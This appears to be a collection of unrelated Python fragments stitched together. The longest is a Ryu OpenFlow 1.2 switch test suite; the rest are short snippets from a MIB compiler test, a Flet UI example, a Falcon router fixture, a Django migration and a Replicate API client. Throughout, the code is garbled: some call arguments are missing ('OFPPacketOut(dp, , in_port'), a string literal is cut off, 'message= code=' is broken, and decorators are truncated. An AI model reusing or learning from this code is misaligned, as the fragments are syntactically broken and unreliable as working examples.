m = dp.ofproto_parser.OFPEchoRequest(dp)
m.data = data
dp.send_msg(m)
def verify_echo_request_has_data(self, dp, msg):
data = msg.data
return (self._verify == data)
def test_aggregate_stats_flow_count(self, dp):
c = 0
while (c < self.n_tables):
self.mod_flow(dp, table_id=c)
c += 1
dp.send_barrier()
match = dp.ofproto_parser.OFPMatch()
m = dp.ofproto_parser.OFPAggregateStatsRequest(dp, dp.ofproto.OFPTT_ALL, dp.ofproto.OFPP_ANY, dp.ofproto.OFPG_ANY, 0, 0, match)
dp.send_msg(m)
def verify_aggregate_stats_flow_count(self, dp, msg):
stats = msg.body
return (stats.flow_count == self.n_tables)
def test_aggregate_stats_flow_count_out_port(self, dp):
actions = [dp.ofproto_parser.OFPActionOutput(1, 1500)]
self.mod_flow(dp, table_id=1, actions=actions)
actions = [dp.ofproto_parser.OFPActionOutput(2, 1500)]
self.mod_flow(dp, table_id=2, actions=actions)
dp.send_barrier()
out_port = 2
match = dp.ofproto_parser.OFPMatch()
m = dp.ofproto_parser.OFPAggregateStatsRequest(dp, dp.ofproto.OFPTT_ALL, out_port, dp.ofproto.OFPG_ANY, 0, 0, match)
dp.send_msg(m)
def verify_aggregate_stats_flow_count_out_port(self, dp, msg):
stats = msg.body
return (stats.flow_count == 1)
def test_aggregate_stats_packet_count(self, dp):
in_port = 1
data = 'test'
self._verify = {'packet_count': 1, 'byte_count': len(data)}
match = dp.ofproto_parser.OFPMatch()
match.set_in_port(in_port)
self.mod_flow(dp, table_id=0, match=match)
output = dp.ofproto.OFPP_TABLE
actions = [dp.ofproto_parser.OFPActionOutput(output, 0)]
m = dp.ofproto_parser.OFPPacketOut(dp, , in_port, actions, data)
dp.send_msg(m)
dp.send_barrier()
match = dp.ofproto_parser.OFPMatch()
m = dp.ofproto_parser.OFPAggregateStatsRequest(dp, dp.ofproto.OFPTT_ALL, dp.ofproto.OFPP_ANY, dp.ofproto.OFPG_ANY, 0, 0, match)
dp.send_msg(m)
def verify_aggregate_stats_packet_count(self, dp, msg):
for (name, val) in self._verify.items():
r_val = getattr(msg.body, name)
if (val != r_val):
return ('%s is mismatched. verify=%s, reply=%s' % (name, val, r_val))
return True
def test_set_config_nomal(self, dp):
flags = dp.ofproto.OFPC_FRAG_NORMAL
self._verify = flags
m = dp.ofproto_parser.OFPSetConfig(dp, flags, 0)
dp.send_msg(m)
dp.send_barrier()
m = dp.ofproto_parser.OFPGetConfigRequest(dp)
dp.send_msg(m)
def verify_set_config_nomal(self, dp, msg):
return (self._verify == msg.flags)
def test_set_config_drop(self, dp):
flags = dp.ofproto.OFPC_FRAG_DROP
self._verify = flags
m = dp.ofproto_parser.OFPSetConfig(dp, flags, 0)
dp.send_msg(m)
dp.send_barrier()
m = dp.ofproto_parser.OFPGetConfigRequest(dp)
dp.send_msg(m)
def verify_set_config_drop(self, dp, msg):
return (self._verify == msg.flags)
def test_set_config_mask(self, dp):
flags = dp.ofproto.OFPC_FRAG_MASK
self._verify = flags
m = dp.ofproto_parser.OFPSetConfig(dp, flags, 0)
dp.send_msg(m)
dp.send_barrier()
m = dp.ofproto_parser.OFPGetConfigRequest(dp)
dp.send_msg(m)
def verify_set_config_mask(self, dp, msg):
return (self._verify == msg.flags)
def test_set_config_ttl_to_controller(self, dp):
flags = dp.ofproto.OFPC_INVALID_TTL_TO_CONTROLLER
self._verify = flags
m = dp.ofproto_parser.OFPSetConfig(dp, flags, 0)
dp.send_msg(m)
dp.send_barrier()
m = dp.ofproto_parser.OFPGetConfigRequest(dp)
dp.send_msg(m)
def verify_set_config_ttl_to_controller(self, dp, msg):
return (self._verify == msg.flags)
def test_set_config_miss_send_len(self, dp):
flags = dp.ofproto.OFPC_FRAG_NORMAL
ms_len = 256
self._verify = ms_len
m = dp.ofproto_parser.OFPSetConfig(dp, flags, ms_len)
dp.send_msg(m)
dp.send_barrier()
m = dp.ofproto_parser.OFPGetConfigRequest(dp)
dp.send_msg(m)
def verify_set_config_miss_send_len(self, dp, msg):
return (self._verify == msg.miss_send_len)
def test_set_config_miss_send_len_max(self, dp):
flags = dp.ofproto.OFPC_FRAG_NORMAL
ms_len = dp.ofproto.OFPCML_MAX
self._verify = ms_len
m = dp.ofproto_parser.OFPSetConfig(dp, flags, ms_len)
dp.send_msg(m)
dp.send_barrier()
m = dp.ofproto_parser.OFPGetConfigRequest(dp)
dp.send_msg(m)
def verify_set_config_miss_send_len_max(self, dp, msg):
return (self._verify == msg.miss_send_len)
def test_set_config_no_buffer(self, dp):
flags = dp.ofproto.OFPC_FRAG_NORMAL
ms_len = dp.ofproto.OFPCML_NO_BUFFER
self._verify = ms_len
m = dp.ofproto_parser.OFPSetConfig(dp, flags, ms_len)
dp.send_msg(m)
dp.send_barrier()
m = dp.ofproto_parser.OFPGetConfigRequest(dp)
dp.send_msg(m)
def verify_set_config_no_buffer(self, dp, msg):
return (self._verify == msg.miss_send_len)
def _verify_flow_inst_type(self, dp, msg):
inst_type = self._verify
stats = msg.body
for s in stats:
for i in s.instructions:
if (i.type == inst_type):
return True
return ('not found inst_type[%s]' % (inst_type,))
def test_flow_add_apply_actions(self, dp):
inst_type = dp.ofproto.OFPIT_APPLY_ACTIONS
self._verify = inst_type
actions = [dp.ofproto_parser.OFPActionOutput(1, 1500)]
self.mod_flow(dp, actions=actions, inst_type=inst_type)
self.send_flow_stats(dp)
def verify_flow_add_apply_actions(self, dp, msg):
return self._verify_flow_inst_type(dp, msg)
def test_flow_add_goto_table(self, dp):
self._verify = dp.ofproto.OFPIT_GOTO_TABLE
inst = [dp.ofproto_parser.OFPInstructionGotoTable(1)]
self.mod_flow(dp, inst=inst)
self.send_flow_stats(dp)
def verify_flow_add_goto_table(self, dp, msg):
return self._verify_flow_inst_type(dp, msg)
def _verify_flow_value(self, dp, msg):
stats = msg.body
verify = self._verify
if (len(verify) != len(stats)):
return ('flow_count is mismatched. verify=%s stats=%s' % (len(verify), len(stats)))
for s in stats:
v_port = (- 1)
v = verify.get(s.table_id, None)
if v:
v_port = v[3].port
s_port = s.instructions[0].actions[0].port
if (v_port != s_port):
return ('port is mismatched. table_id=%s verify=%s, stats=%s' % (s.table_id, v_port, s_port))
return True
def _add_flow_for_flow_mod_tests(self, dp):
a1 = dp.ofproto_parser.OFPActionOutput(1, 1500)
a2 = dp.ofproto_parser.OFPActionOutput(2, 1500)
tables = {0: [65535, 10, (b'\xee' * 6), a1], 1: [65280, 10, (b'\xee' * 6), a2], 2: [61440, 100, (b'\xee' * 6), a1], 3: [0, 10, (b'\xff' * 6), a1]}
self._verify = tables
for (table_id, val) in tables.items():
match = dp.ofproto_parser.OFPMatch()
match.set_dl_dst(val[2])
self.mod_flow(dp, match=match, actions=[val[3]], table_id=table_id, cookie=val[0], priority=val[1])
dp.send_barrier()
def test_flow_mod_table_id(self, dp):
self._add_flow_for_flow_mod_tests(dp)
action = dp.ofproto_parser.OFPActionOutput(3, 1500)
self._verify[3][3] = action
table_id = 3
self.mod_flow(dp, command=dp.ofproto.OFPFC_MODIFY, actions=[action], table_id=table_id)
dp.send_barrier()
self.send_flow_stats(dp)
def verify_flow_mod_table_id(self, dp, msg):
return self._verify_flow_value(dp, msg)
def test_flow_mod_cookie(self, dp):
self._add_flow_for_flow_mod_tests(dp)
action = dp.ofproto_parser.OFPActionOutput(3, 1500)
self._verify[1][3] = action
cookie = 65280
cookie_mask = 65535
table_id = 1
self.mod_flow(dp, command=dp.ofproto.OFPFC_MODIFY, actions=[action], table_id=table_id, cookie=cookie, cookie_mask=cookie_mask)
dp.send_barrier()
self.send_flow_stats(dp)
def verify_flow_mod_cookie(self, dp, msg):
return self._verify_flow_value(dp, msg)
def test_flow_mod_cookie_mask(self, dp):
self._add_flow_for_flow_mod_tests(dp)
action = dp.ofproto_parser.OFPActionOutput(3, 1500)
self._verify[0][3] = action
self._verify[1][3] = action
cookie = 65535
cookie_mask = 65280
for table_id in range(2):
self.mod_flow(dp, command=dp.ofproto.OFPFC_MODIFY, actions=[action], table_id=table_id, cookie=cookie, cookie_mask=cookie_mask)
dp.send_barrier()
self.send_flow_stats(dp)
def verify_flow_mod_cookie_mask(self, dp, msg):
return self._verify_flow_value(dp, msg)
def test_flow_mod_match(self, dp):
self._add_flow_for_flow_mod_tests(dp)
action = dp.ofproto_parser.OFPActionOutput(3, 1500)
self._verify[3][3] = action
match = dp.ofproto_parser.OFPMatch()
match.set_dl_dst((b'\xff' * 6))
table_id = 3
self.mod_flow(dp, command=dp.ofproto.OFPFC_MODIFY, actions=[action], table_id=table_id, match=match)
dp.send_barrier()
self.send_flow_stats(dp)
def verify_flow_mod_match(self, dp, msg):
return self._verify_flow_value(dp, msg)
def test_flow_mod_strict(self, dp):
self._add_flow_for_flow_mod_tests(dp)
action = dp.ofproto_parser.OFPActionOutput(3, 1500)
self._verify[2][3] = action
match = dp.ofproto_parser.OFPMatch()
match.set_dl_dst((b'\xee' * 6))
priority = 100
table_id = 2
self.mod_flow(dp, command=dp.ofproto.OFPFC_MODIFY_STRICT, actions=[action], table_id=table_id, match=match, priority=priority)
dp.send_barrier()
self.send_flow_stats(dp)
def verify_flow_mod_strict(self, dp, msg):
return self._verify_flow_value(dp, msg)
def test_flow_del_table_id(self, dp):
self._add_flow_for_flow_mod_tests(dp)
del self._verify[3]
table_id = 3
self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE, table_id=table_id)
dp.send_barrier()
self.send_flow_stats(dp)
def verify_flow_del_table_id(self, dp, msg):
return self._verify_flow_value(dp, msg)
def test_flow_del_table_id_all(self, dp):
self._add_flow_for_flow_mod_tests(dp)
self._verify = {}
self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE, table_id=dp.ofproto.OFPTT_ALL)
dp.send_barrier()
self.send_flow_stats(dp)
def verify_flow_del_table_id_all(self, dp, msg):
return self._verify_flow_value(dp, msg)
def test_flow_del_cookie(self, dp):
self._add_flow_for_flow_mod_tests(dp)
del self._verify[1]
cookie = 65280
cookie_mask = 65535
self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE, table_id=dp.ofproto.OFPTT_ALL, cookie=cookie, cookie_mask=cookie_mask)
dp.send_barrier()
self.send_flow_stats(dp)
def verify_flow_del_cookie(self, dp, msg):
return self._verify_flow_value(dp, msg)
def test_flow_del_cookie_mask(self, dp):
self._add_flow_for_flow_mod_tests(dp)
del self._verify[0]
del self._verify[1]
cookie = 65535
cookie_mask = 65280
self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE, table_id=dp.ofproto.OFPTT_ALL, cookie=cookie, cookie_mask=cookie_mask)
dp.send_barrier()
self.send_flow_stats(dp)
def verify_flow_del_cookie_mask(self, dp, msg):
return self._verify_flow_value(dp, msg)
def test_flow_del_match(self, dp):
self._add_flow_for_flow_mod_tests(dp)
del self._verify[3]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_dst((b'\xff' * 6))
self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE, table_id=dp.ofproto.OFPTT_ALL, match=match)
dp.send_barrier()
self.send_flow_stats(dp)
def verify_flow_del_match(self, dp, msg):
return self._verify_flow_value(dp, msg)
def test_flow_del_out_port(self, dp):
self._add_flow_for_flow_mod_tests(dp)
del self._verify[1]
out_port = 2
self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE, table_id=dp.ofproto.OFPTT_ALL, out_port=out_port)
dp.send_barrier()
self.send_flow_stats(dp)
def verify_flow_del_out_port(self, dp, msg):
return self._verify_flow_value(dp, msg)
def test_flow_del_strict(self, dp):
self._add_flow_for_flow_mod_tests(dp)
del self._verify[2]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_dst((b'\xee' * 6))
priority = 100
self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT, table_id=dp.ofproto.OFPTT_ALL, match=match, priority=priority)
dp.send_barrier()
self.send_flow_stats(dp)
def verify_flow_del_strict(self, dp, msg):
return self._verify_flow_value(dp, msg)
def _send_port_mod(self, dp, config, mask):
p = self.get_port(dp)
if (not p):
err = 'need attached port to switch.'
self.results[self.current] = err
self.start_next_test(dp)
return
self._verify = [p.port_no, (config & mask)]
m = dp.ofproto_parser.OFPPortMod(dp, p.port_no, p.hw_addr, config, mask, 0)
dp.send_msg(m)
dp.send_barrier()
time.sleep(1)
m = dp.ofproto_parser.OFPFeaturesRequest(dp)
dp.send_msg(m)
def _verify_port_mod_config(self, dp, msg):
port_no = self._verify[0]
config = self._verify[1]
port = msg.ports[port_no]
if (config != port.config):
return ('config is mismatched. verify=%s, stats=%s' % (bin(config), bin(port.config)))
return True
def test_port_mod_config_01_all(self, dp):
config = 101
mask = 127
self._send_port_mod(dp, config, mask)
def verify_port_mod_config_01_all(self, dp, msg):
return self._verify_port_mod_config(dp, msg)
def test_port_mod_config_02_none(self, dp):
config = 0
mask = 127
self._send_port_mod(dp, config, mask)
def verify_port_mod_config_02_none(self, dp, msg):
return self._verify_port_mod_config(dp, msg)
def test_port_mod_config_03_mask(self, dp):
config = 101
mask = 120
self._send_port_mod(dp, config, mask)
def verify_port_mod_config_03_mask(self, dp, msg):
res = self._verify_port_mod_config(dp, msg)
port_no = self._verify[0]
p = msg.ports[port_no]
m = dp.ofproto_parser.OFPPortMod(dp, p.port_no, p.hw_addr, 0, 127, 0)
dp.send_msg(m)
dp.send_barrier()
return res
def test_port_stats_port_no(self, dp):
p = self.get_port(dp)
if (not p):
err = 'need attached port to switch.'
self.results[self.current] = err
self.start_next_test(dp)
return
self._verify = p.port_no
m = dp.ofproto_parser.OFPPortStatsRequest(dp, p.port_no)
dp.send_msg(m)
def verify_port_stats_port_no(self, dp, msg):
ports = msg.body
if (len(ports) > 1):
return ('reply some ports.\n%s' % ports)
if (ports[0].port_no != self._verify):
return ('port_no is mismatched. request=%s reply=%s' % (self._verify, ports[0].port_no))
return True
def _add_flow_flow_removed(self, dp, reason, table_id=0, cookie=255, priority=100, in_port=1, idle_timeout=0, hard_timeout=0):
self._verify = {}
self._verify['params'] = {'reason': reason, 'table_id': table_id, 'cookie': cookie, 'priority': priority}
self._verify['in_port'] = in_port
self._verify['timeout'] = idle_timeout
if hard_timeout:
if ((idle_timeout == 0) or (idle_timeout > hard_timeout)):
self._verify['timeout'] = hard_timeout
match = dp.ofproto_parser.OFPMatch()
match.set_in_port(in_port)
self.mod_flow(dp, match=match, cookie=cookie, priority=priority, table_id=table_id, idle_timeout=idle_timeout, hard_timeout=hard_timeout, flags=dp.ofproto.OFPFF_SEND_FLOW_REM)
def _verify_flow_removed(self, dp, msg):
params = self._verify['params']
in_port = self._verify['in_port']
timeout = self._verify['timeout']
if timeout:
duration_nsec = ((msg.duration_sec * (10 ** 9)) + msg.duration_nsec)
timeout_nsec = (timeout * (10 ** 9))
l = ((timeout - 0.5) * (10 ** 9))
h = ((timeout + 1.5) * (10 ** 9))
if (not (l < duration_nsec < h)):
return ('bad duration time. set=%s(nsec), duration=%s(nsec)' % (timeout_nsec, duration_nsec))
for (name, val) in params.items():
r_val = getattr(msg, name)
if (val != r_val):
return ('%s is mismatched. verify=%s, reply=%s' % (name, val, r_val))
for f in msg.match.fields:
if (f.header == ofproto_v1_2.OXM_OF_IN_PORT):
if (f.value != in_port):
return ('in_port is mismatched. verify=%s, reply=%s' % (in_port, f.value))
return True
def test_flow_removed_idle_timeout(self, dp):
reason = dp.ofproto.OFPRR_IDLE_TIMEOUT
idle_timeout = 2
self._add_flow_flow_removed(dp, reason, idle_timeout=idle_timeout)
def verify_flow_removed_idle_timeout(self, dp, msg):
return self._verify_flow_removed(dp, msg)
def test_flow_removed_idle_timeout_hit(self, dp):
reason = dp.ofproto.OFPRR_IDLE_TIMEOUT
idle_timeout = 5
in_port = 1
sleep = 2
self._add_flow_flow_removed(dp, reason, in_port=in_port, idle_timeout=idle_timeout)
self._verify['timeout'] = (idle_timeout + sleep)
time.sleep(sleep)
output = dp.ofproto.OFPP_TABLE
actions = [dp.ofproto_parser.OFPActionOutput(output, 0)]
m = dp.ofproto_parser.OFPPacketOut(dp, , in_port, actions, None)
dp.send_msg(m)
def verify_flow_removed_idle_timeout_hit(self, dp, msg):
return self._verify_flow_removed(dp, msg)
def test_flow_removed_hard_timeout(self, dp):
reason = dp.ofproto.OFPRR_HARD_TIMEOUT
hard_timeout = 2
self._add_flow_flow_removed(dp, reason, hard_timeout=hard_timeout)
def verify_flow_removed_hard_timeout(self, dp, msg):
return self._verify_flow_removed(dp, msg)
def test_flow_removed_hard_timeout_hit(self, dp):
reason = dp.ofproto.OFPRR_HARD_TIMEOUT
hard_timeout = 5
in_port = 1
sleep = 2
self._add_flow_flow_removed(dp, reason, in_port=in_port, hard_timeout=hard_timeout)
dp.send_barrier()
time.sleep(sleep)
output = dp.ofproto.OFPP_TABLE
actions = [dp.ofproto_parser.OFPActionOutput(output, 0)]
m = dp.ofproto_parser.OFPPacketOut(dp, , in_port, actions, None)
dp.send_msg(m)
def verify_flow_removed_hard_timeout_hit(self, dp, msg):
return self._verify_flow_removed(dp, msg)
def test_flow_removed_delete(self, dp):
reason = dp.ofproto.OFPRR_DELETE
self._add_flow_flow_removed(dp, reason)
dp.send_barrier()
self.delete_all_flows(dp)
def verify_flow_removed_delete(self, dp, msg):
return self._verify_flow_removed(dp, msg)
def test_flow_removed_table_id(self, dp):
reason = dp.ofproto.OFPRR_DELETE
table_id = 1
self._add_flow_flow_removed(dp, reason, table_id=table_id)
dp.send_barrier()
self.delete_all_flows(dp)
def verify_flow_removed_table_id(self, dp, msg):
return self._verify_flow_removed(dp, msg)
def _send_packet_out(self, dp, buffer_id=, in_port=None, output=None, data=''):
if (in_port is None):
in_port = dp.ofproto.OFPP_LOCAL
if (output is None):
output = dp.ofproto.OFPP_CONTROLLER
self._verify['in_port'] = in_port
self._verify['data'] = data
actions = [dp.ofproto_parser.OFPActionOutput(output, len(data))]
m = dp.ofproto_parser.OFPPacketOut(dp, buffer_id, in_port, actions, data)
dp.send_msg(m)
def _verify_packet_in(self, dp, msg):
for (name, val) in self._verify.items():
if (name == 'in_port'):
for f in msg.match.fields:
if (f.header == ofproto_v1_2.OXM_OF_IN_PORT):
r_val = f.value
else:
r_val = getattr(msg, name)
if (val != r_val):
return ('%s is mismatched. verify=%s, reply=%s' % (name, val, r_val))
return True
def test_packet_in_action(self, dp):
self._verify = {}
self._verify['reason'] = dp.ofproto.OFPR_ACTION
self._send_packet_out(dp)
def verify_packet_in_action(self, dp, msg):
return self._verify_packet_in(dp, msg)
def test_packet_in_data(self, dp):
self._verify = {}
self._verify['reason'] = dp.ofproto.OFPR_ACTION
data = 'test'
self._send_packet_out(dp, data=data)
def verify_packet_in_data(self, dp, msg):
return self._verify_packet_in(dp, msg)
def test_packet_in_table_id(self, dp):
in_port = 1
table_id = 2
output = dp.ofproto.OFPP_TABLE
self._verify = {}
self._verify['reason'] = dp.ofproto.OFPR_ACTION
self._verify['table_id'] = table_id
match = dp.ofproto_parser.OFPMatch()
match.set_in_port(in_port)
inst = [dp.ofproto_parser.OFPInstructionGotoTable(table_id)]
self.mod_flow(dp, inst=inst, match=match)
match = dp.ofproto_parser.OFPMatch()
match.set_in_port(in_port)
out = dp.ofproto.OFPP_CONTROLLER
actions = [dp.ofproto_parser.OFPActionOutput(out, 0)]
self.mod_flow(dp, actions=actions, match=match, table_id=table_id)
dp.send_barrier()
self._send_packet_out(dp, in_port=in_port, output=output)
def verify_packet_in_table_id(self, dp, msg):
return self._verify_packet_in(dp, msg)
_ev_cls(ofp_event.EventOFPEchoReply, MAIN_DISPATCHER)
def echo_replay_handler(self, ev):
if (self.current.find('echo_request') > 0):
self.run_verify(ev)
_ev_cls(ofp_event.EventOFPStatsReply, MAIN_DISPATCHER)
def stats_reply_handler(self, ev):
if (self.current is None):
msg = ev.msg
dp = msg.datapath
if (self._verify == dp.ofproto.OFPST_TABLE):
self.table_stats = msg.body
self.start_next_test(dp)
else:
self.run_verify(ev)
_ev_cls(ofp_event.EventOFPSwitchFeatures, MAIN_DISPATCHER)
def features_replay_handler(self, ev):
if (self.current is None):
pass
else:
self.run_verify(ev)
_ev_cls(ofp_event.EventOFPGetConfigReply, MAIN_DISPATCHER)
def get_config_replay_handler(self, ev):
self.run_verify(ev)
_ev_cls(ofp_event.EventOFPBarrierReply, MAIN_DISPATCHER)
def barrier_replay_handler(self, ev):
if (self.current == 'test_barrier_request'):
self.run_verify(ev)
_ev_cls(ofp_event.EventOFPPortStatus, MAIN_DISPATCHER)
def port_status_handler(self, ev):
pass
_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def packet_in_handler(self, ev):
if self.current.find('packet_in'):
self.run_verify(ev)
_ev_cls(ofp_event.EventOFPFlowRemoved, MAIN_DISPATCHER)
def flow_removed_handler(self, ev):
if (self.current.find('flow_removed') > 0):
self.run_verify(ev)
_ev_cls(ofp_event.EventOFPErrorMsg, MAIN_DISPATCHER)
def error_handler(self, ev):
if (self.current.find('error') > 0):
self.run_verify(ev)
def is_supported(self, t):
unsupported = []
for u in unsupported:
if (t.find(u) != (- 1)):
return False
return True |
class ObjectTypeMibTableMultipleIndicesTestCase(unittest.TestCase):
def setUp(self):
ast = parserFactory()().parse(self.__class__.__doc__)[0]
(mibInfo, symtable) = SymtableCodeGen().genCode(ast, {}, genTexts=True)
(self.mibInfo, pycode) = PySnmpCodeGen().genCode(ast, {mibInfo.name: symtable}, genTexts=True)
codeobj = compile(pycode, 'test', 'exec')
self.ctx = {'mibBuilder': MibBuilder()}
exec(codeobj, self.ctx, self.ctx)
def testObjectTypeTableRowIndex(self):
self.assertEqual(self.ctx['testEntry'].getIndexNames(), ((0, 'TEST-MIB', 'testIndex'), (0, 'TEST-MIB', 'testValue')), 'bad multiple table indices') |
def test_model_to_dict(tresults, tbands):
out = model_to_dict(tresults, peak_org=1)
assert isinstance(out, dict)
assert ('cf_0' in out)
assert (out['cf_0'] == tresults.peak_params[(0, 0)])
assert (not ('cf_1' in out))
out = model_to_dict(tresults, peak_org=2)
assert ('cf_0' in out)
assert ('cf_1' in out)
assert (out['cf_1'] == tresults.peak_params[(1, 0)])
out = model_to_dict(tresults, peak_org=3)
assert ('cf_2' in out)
assert np.isnan(out['cf_2'])
out = model_to_dict(tresults, peak_org=tbands)
assert ('alpha_cf' in out) |
def example():
return ft.Column(controls=[ft.TextField(label='Underlined', border='underline', hint_text='Enter text here'), ft.TextField(label='Underlined filled', border=ft.InputBorder.UNDERLINE, filled=True, hint_text='Enter text here'), ft.TextField(label='Borderless', border='none', hint_text='Enter text here'), ft.TextField(label='Borderless filled', border=ft.InputBorder.NONE, filled=True, hint_text='Enter text here')]) |
def router():
router = DefaultRouter()
router.add_route('/repos', ResourceWithId(1))
router.add_route('/repos/{org}', ResourceWithId(2))
router.add_route('/repos/{org}/{repo}', ResourceWithId(3))
router.add_route('/repos/{org}/{repo}/commits', ResourceWithId(4))
router.add_route('/repos/{org}/{repo}/compare/{usr0}:{branch0}...{usr1}:{branch1}', ResourceWithId(5))
router.add_route('/teams/{id}', ResourceWithId(6))
router.add_route('/teams/{id}/members', ResourceWithId(7))
router.add_route('/teams/default', ResourceWithId(19))
router.add_route('/teams/default/members/thing', ResourceWithId(19))
router.add_route('/user/memberships', ResourceWithId(8))
router.add_route('/emojis', ResourceWithId(9))
router.add_route('/repos/{org}/{repo}/compare/{usr0}:{branch0}...{usr1}:{branch1}/full', ResourceWithId(10))
router.add_route('/repos/{org}/{repo}/compare/all', ResourceWithId(11))
router.add_route('/emojis/signs/0', ResourceWithId(12))
router.add_route('/emojis/signs/{id}', ResourceWithId(13))
router.add_route('/emojis/signs/42', ResourceWithId(14))
router.add_route('/emojis/signs/42/small.jpg', ResourceWithId(23))
router.add_route('/emojis/signs/78/small.png', ResourceWithId(24))
router.add_route('/emojis/signs/78/small(png)', ResourceWithId(25))
router.add_route('/emojis/signs/78/small_png', ResourceWithId(26))
router.add_route('/images/{id}.gif', ResourceWithId(27))
router.add_route('/repos/{org}/{repo}/compare/{usr0}:{branch0}...{usr1}:{branch1}/part', ResourceWithId(15))
router.add_route('/repos/{org}/{repo}/compare/{usr0}:{branch0}', ResourceWithId(16))
router.add_route('/repos/{org}/{repo}/compare/{usr0}:{branch0}/full', ResourceWithId(17))
router.add_route('/gists/{id}/{representation}', ResourceWithId(21))
router.add_route('/gists/{id}/raw', ResourceWithId(18))
router.add_route('/gists/first', ResourceWithId(20))
router.add_route('/item/{q}', ResourceWithId(28))
router.add_route('/cvt/teams/{id:int(min=7)}', ResourceWithId(29))
router.add_route('/cvt/teams/{id:int(min=7)}/members', ResourceWithId(30))
router.add_route('/cvt/teams/default', ResourceWithId(31))
router.add_route('/cvt/teams/default/members/{id:int}-{tenure:int}', ResourceWithId(32))
router.add_route('/cvt/repos/{org}/{repo}/compare/{usr0}:{branch0:int}...{usr1}:{branch1:int}/part', ResourceWithId(33))
router.add_route('/cvt/repos/{org}/{repo}/compare/{usr0}:{branch0:int}', ResourceWithId(34))
router.add_route('/cvt/repos/{org}/{repo}/compare/{usr0}:{branch0:int}/full', ResourceWithId(35))
return router |
def test_horizontal_alignment_enum():
r = ft.Column(horizontal_alignment=ft.CrossAxisAlignment.STRETCH)
assert isinstance(r.horizontal_alignment, ft.CrossAxisAlignment)
assert isinstance(r._get_attr('horizontalAlignment'), str)
cmd = r._build_add_commands()
assert (cmd[0].attrs['horizontalalignment'] == 'stretch') |
_meta(characters.youmu.NitoryuuWearEquipmentAction)
class NitoryuuWearEquipmentAction():
def sound_effect(self, act):
card = act.card
tgt = act.target
equips = tgt.equips
cat = card.equipment_category
if ((cat == 'weapon') and [e for e in equips if (e.equipment_category == 'weapon')]):
return 'thb-cv-youmu_nitoryuu' |
def isFiltered(link, badwords, badcompounds):
if link.startswith('data:'):
return True
linkl = link.lower()
if any([(badword in linkl) for badword in badwords]):
return True
if any([all([(badword in linkl) for badword in badcompound]) for badcompound in badcompounds]):
print('Compound Filtered:', link, [badword for badword in badwords if (badword in linkl)])
return True
return False |
class Migration(migrations.Migration):
dependencies = [('forum_permission', '0001_initial')]
operations = [migrations.AlterField(model_name='forumpermission', name='codename', field=models.CharField(db_index=True, max_length=150, unique=True, verbose_name='Permission codename')), migrations.AlterField(model_name='forumpermission', name='is_global', field=models.BooleanField(db_index=True, default=False, help_text='This permission can be granted globally to all the forums', verbose_name='Global permission')), migrations.AlterField(model_name='forumpermission', name='is_local', field=models.BooleanField(db_index=True, default=True, help_text='This permission can be granted individually for each forum', verbose_name='Local permission')), migrations.AlterField(model_name='groupforumpermission', name='has_perm', field=models.BooleanField(db_index=True, default=True, verbose_name='Has perm')), migrations.AlterField(model_name='userforumpermission', name='anonymous_user', field=models.BooleanField(db_index=True, default=False, verbose_name='Target anonymous user')), migrations.AlterField(model_name='userforumpermission', name='has_perm', field=models.BooleanField(db_index=True, default=True, verbose_name='Has perm'))] |
class ReplicateApi(ProviderInterface, ImageInterface, TextInterface):
provider_name = 'replicate'
def __init__(self, api_keys: Dict={}):
api_settings = load_provider(ProviderDataEnum.KEY, provider_name=self.provider_name, api_keys=api_keys)
self.headers = {'Content-Type': 'application/json', 'Accept': 'application/json', 'Authorization': f"Token {api_settings['api_key']}"}
self.base_url = '
def __get_stream_response(self, url: str) -> Generator:
headers = {**self.headers, 'Accept': 'text/event-stream'}
response = requests.get(url, headers=headers, stream=True)
last_chunk = ''
for chunk in response.iter_lines():
if (b'event: done' in chunk):
response.close()
break
elif ((last_chunk == b'event: error') and chunk.startswith(b'data: ')):
(yield ChatStreamResponse(text='[ERROR]', blocked=True, provider=self.provider_name))
elif chunk.startswith(b'data: '):
if ((last_chunk == b'data: ') and (chunk == b'data: ')):
(yield ChatStreamResponse(text='\n', blocked=False, provider=self.provider_name))
else:
(yield ChatStreamResponse(text=chunk.decode('utf-8').replace('data: ', ''), blocked=False, provider=self.provider_name))
last_chunk = chunk
def __get_response(self, url: str, payload: dict, stream: Literal[True]) -> Generator:
...
def __get_response(self, url: str, payload: dict, stream: Literal[False]) -> dict:
...
def __get_response(self, url: str, payload: dict, stream: bool=False) -> Union[(Generator, dict)]:
if stream:
payload['stream'] = True
launch_job_response = requests.post(url, headers=self.headers, json=payload)
try:
launch_job_response_dict = launch_job_response.json()
except requests.JSONDecodeError:
raise ProviderException(launch_job_response.text, code=launch_job_response.status_code)
if (launch_job_response.status_code != 201):
raise ProviderException(launch_job_response_dict.get('detail'), code=launch_job_response.status_code)
if stream:
return self.__get_stream_response(launch_job_response_dict['urls']['stream'])
url_get_response = launch_job_response_dict['urls']['get']
response = requests.get(url_get_response, headers=self.headers)
if (response.status_code >= 500):
raise ProviderException(message= code=response.status_code)
response_dict = response.json()
if (response.status_code != 200):
raise ProviderException(response_dict.get('detail'), code=response.status_code)
status = response_dict['status']
while (status != 'succeeded'):
response = requests.get(url_get_response, headers=self.headers)
try:
response_dict = response.json()
except requests.JSONDecodeError:
raise ProviderException(response.text, code=response.status_code)
if (response.status_code != 200):
raise ProviderException(response_dict.get('error', response_dict), code=response.status_code)
status = response_dict['status']
return response_dict
def image__generation(self, text: str, resolution: Literal[('256x256', '512x512', '1024x1024')], num_images: int=1, model: Optional[str]=None) -> ResponseType[GenerationDataClass]:
url = f'{self.base_url}/predictions'
size = resolution.split('x')
version = get_model_id_image[model]
payload = {'input': {'prompt': text, 'width': int(size[0]), 'height': int(size[1])}, 'version': version}
response_dict = ReplicateApi.__get_response(self, url, payload)
image_url = response_dict.get('output')
if isinstance(image_url, list):
image_url = image_url[0]
image_bytes = base64.b64encode(requests.get(image_url).content)
return ResponseType[GenerationDataClass](original_response=response_dict, standardized_response=GenerationDataClass(items=[GeneratedImageDataClass(image=image_bytes, image_resource_url=image_url)]))
